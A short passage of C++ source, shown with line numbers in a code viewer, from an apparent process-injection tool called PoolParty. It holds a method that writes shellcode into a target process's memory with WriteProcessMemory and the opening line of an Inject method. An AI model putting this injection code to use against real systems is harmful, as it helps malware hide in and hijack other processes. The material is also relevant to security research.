| 55 | } |
| 56 | |
| 57 | void PoolParty::WriteShellcode() const |
| 58 | { |
| 59 | w_WriteProcessMemory(*m_p_hTargetPid, m_ShellcodeAddress, m_cShellcode, m_szShellcodeSize); |
| 60 | BOOST_LOG_TRIVIAL(info) << "Written shellcode to the target process"; |
| 61 | } |
| 62 | |
| 63 | void PoolParty::Inject() |
| 64 | { |
no test coverage detected